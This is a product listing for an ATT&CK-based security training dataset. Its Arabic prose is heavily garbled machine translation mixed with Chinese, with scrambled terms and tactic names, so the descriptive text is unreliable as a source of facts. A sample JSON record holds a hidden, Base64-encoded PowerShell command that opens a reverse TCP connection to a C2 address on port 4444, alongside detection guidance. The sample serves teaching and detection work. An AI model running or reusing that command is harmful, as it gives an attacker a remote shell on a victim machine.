لمحة عامة عن البيانات
التعريف:MITRE ATT&CK 安全技能训练数据集مقدم منشركة تشانغشا لانغوي لتكنولوجيا المعلومات المحدودةواستناداً إلى إطار المعرفة المفتوح الخاص بشبكة " تات " ، فإن مجموعة بيانات التدريب الأمني العالية الجودة تُبنى على موقع هجومي حقيقي، وتقارير استخبارات التهديدات، وبيانات الحوادث الأمنية، وتشمل جميع الفئات التكتيكية الـ 14، و200+تقنية/تقنية فرعية، وكل منها هيكل رابطة مكون من خمسة أبعاد، ينظمه " قواعد XML + PCAP " ، ويعيد النص الأصلي + علامة هجومية " .
| اسم البيانات | MITRE ATT&CK 安全技能训练数据集 |
| مجموع حجم البيانات | 1,000~20,000条 |
| نوع البيانات | JSON + PCAP (Five-Cyber Linking Structure) |
| المصدر | Longhui Security Laboratory + Public threat information |
| نوع الترخيص | التراخيص التجارية مرفق وثائق التفويض الكاملة |
| دورة التسليم | 1-2个月 |
| 涵盖战术 | إعادة النظر/الاستكشاف/الاستكشاف/الاستقبال الأولي/التبادل/التنقيح/التقدير التعويضي/التقدير الدفاعي/الاسترداد/الإدارة/الإدارة الشاملة/التحكم/التسرب/العمل (14 جميعها مشمولة) |
| الناتج | JSONL / CSV / Excel |
| اللغة | اللغة الصينية والإنكليزية |
مجالات البيانات الأساسية
وتتضمن كل بيانات بيانات بيانات تقنية كاملة عن " تاس " ، ووصفاً للهجوم، وطرائق الكشف، وتدابير التخفيف، وأمثلة العمليات، والمعلومات المتصلة ببرنامج عمل بيجين، تغطي الاحتياجات من المشهد بأكمله من الحقن المعرفي إلى التدريب الميداني.
| الفئة الميدانية | العدة الميدانية | المجالات النموذجية |
|---|---|---|
| 技术元数据 | 6 | Technique_id (ATTCKTID), name (technical name), technical (applicable platform), personnel_required (required privileges), data_sources (data source) |
| وصف الهجوم | 3 | التنويه (وصف مفصل لتقنيات الهجوم)، المادة - خلاصات (أمثلة على العمليات الفعلية لأفضل التقنيات التطبيقية)، الوصف - التوصية (توصيات الكشف) |
| 检测方法 | 3 | البيانات - نوع (نوع الكشف)، البيانات - المصدر - المطلوب (البيانات المطلوبة)، البيانات - اللوجية (الوصف المنطقي للكشف) |
| 缓解措施 | 3 | التخفيف - (المقياس التعريفي)، التقادم - الاسم (الاسم القياسي)، التقادم - الوصف (وصف التدبير) |
| 过程示例 | 3 | مثال: - كوماند (قواعد متعددة)، مثال على ذلك: أداة الاستخدام، الإجراء - الوصف (وصف العملية) |
| رابطة برنامج العمل | 4 | pcap_file(PCAP文件名)、pcap_md5(文件MD5)、pcap_size(文件大小)、flow_signature(流量特征签名) |
عرض عينات البيانات
وفيما يلي عينة منظمة من نوع " يوكون " تبين شكل البيانات التدريبية ذات المسارات الخمس لتكنولوجيا " تات " .
{
"entry_id": "ATTACK-TRN-2024-0001523",
"technique_metadata": {
"technique_id": "T1059",
"name": "命令与脚本解释器",
"tactic": "Execution",
"platform": ["Windows", "Linux", "macOS"],
"permissions_required": "User",
"data_sources": ["Process Creation", "Command Execution", "Script Load"]
},
"attack_description": {
"description": "攻击者利用命令和脚本解释器(如PowerShell、Bash、Python)执行恶意命令、脚本或二进制文件。这是最常见的攻击执行手段之一,可绕过应用白名单等防御机制。",
"procedure_example": "APT29使用PowerShell执行无文件攻击,通过Invoke-Expression加载内存中的恶意载荷,并利用WMI持久化。",
"detection_recommendation": "监控PowerShell脚本块日志(Event ID 4104)、进程创建事件(Event ID 4688)、命令行参数审计。"
},
"detection": {
"detection_type": "Behavioral",
"data_source_required": ["Windows Event Log", "Sysmon", "EDR"],
"detection_logic": "检测非交互式PowerShell执行(-EncodedCommand、-WindowStyle Hidden)、Bash反弹Shell、Python调用subprocess/os.system执行系统命令。"
},
"mitigation": {
"mitigation_id": "M1042",
"mitigation_name": "禁用或限制脚本解释器",
"mitigation_description": "配置AppLocker/WDAC限制脚本执行,启用PowerShell约束语言模式,使用组策略禁用不必要的脚本解释器。"
},
"procedure_example": {
"example_command": "powershell -NoP -NonI -W Hidden -Enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADEALgAxADAAMAAiACwANAA0ADQANAApADsA",
"example_tool": "PowerShell Empire",
"procedure_description": "使用Base64编码的PowerShell命令建立反向TCP连接,连接C2服务器192.168.1.100:4444。"
},
"pcap_info": {
"pcap_file": "T1059_cmd_shell_reverse_20240115.pcap",
"pcap_md5": "a3f8b2c91d4e5f60789a1b2c3d4e5f60",
"pcap_size": "245678",
"flow_signature": "TCP SYN → 192.168.1.100:4444, Base64 PowerShell payload in HTTP POST body"
},
"answer": {
"is_attack": true,
"attack_type": "命令执行",
"attck_phase": "Execution",
"true_positive_rate": 0.97
}
}السيناريوهات التطبيقية
نموذج رئيسي للتدريب قبل التدريب
:: 000 20 من البيانات التدريبية ذات الجودة العالية التي أعدتها منظمة " توك " والتي تغطي دورة حياة الهجوم الكاملة، ودعم التدريب المسبق وضبط نماذج القاعدة من قبيل GPT/Lama/Qwen في مجال أمن الفضاء الإلكتروني، وتعزيز عمق النموذج " المعرفة الهجومية " بشكل كبير.
زيادة المعرفة
:: نظم معارف مُهيَّلة تستند إلى 14 تكنولوجيا تكتيكية رئيسية تُستخدم في إطار " تكتيكية " ، وُضعت بصورة منهجية في إطار نموذج " تات " (TATT) و " CK " (Tat) " (Tat) " ، و " CK " ، و " ، مما يمكِّن النموذج من تحديد الهجمات وتفسيرها ودواها بدقة.
التدريب المعقول على الكفاءة
نموذج دعم البيانات لرابطة الخمس مسارات يتعلم سلسلة التعليل الكامل لـ "الرد على ترددات الحد الأقصى المُؤكّد" ويدرب على العقل السببي والقدرة على بناء سلسلة الأدلة لنموذج القاعدة الآمن.
SOC Automation
واستناداً إلى قواعد الكشف عن التكنولوجيا وتدابير الاستجابة التي وضعتها لجنة البلدان الأمريكية لمكافحة الإرهاب، تم تدريب شركة SOC الآلية على وضع النصوص AI من أجل التشغيل الآلي لتنفيذ قواعد اختبار رسم الخرائط الخاصة بشركة " تاتسيك " من أجل اتخاذ تدابير للرد.
حاربوا ضد عملية مكافحة المحاكاة
ويمكن استخدام الأمثلة الغنية على عمليات الهجوم وبيانات حركة المرور الخاصة بفريق الشرطة المدنية لبناء منبر يحركه المعهد للتمارين الهجومية، وإضفاء الطابع الآلي على مسار ضربات الفريق الأحمر، واستراتيجية الفريق الأزرق للكشف عن الهجمات.
تحليل الروابط الاستخباراتية
(أ) مواءمة وصف TTP آلياً في تقرير تكنولوجيا المعلومات والاتصالات مع القيود التكنولوجية الخاصة بشبكة تكنولوجيا المعلومات والاتصالات، وتدريب تحليل وصلات المعلومات الاستخباراتية المتعلقة بالتهديدات، وتحقيق رسم خرائط آلية وتصوير صور المنظمات من نصوص الاستخبارات إلى المضاربات التقنية.
المشاكل المشتركة
برنامج بيانات أمني من صنع التقليد؟
شركة تشانغشا لانغوي لتكنولوجيا المعلومات المحدودة The DataAssetsAPI platform, which aims to provide high-quality, compliant security data assets to AI enterprises and scientific institutions.
عينة من البيانات قبل استعراض التوحيد التكتيكي/التقني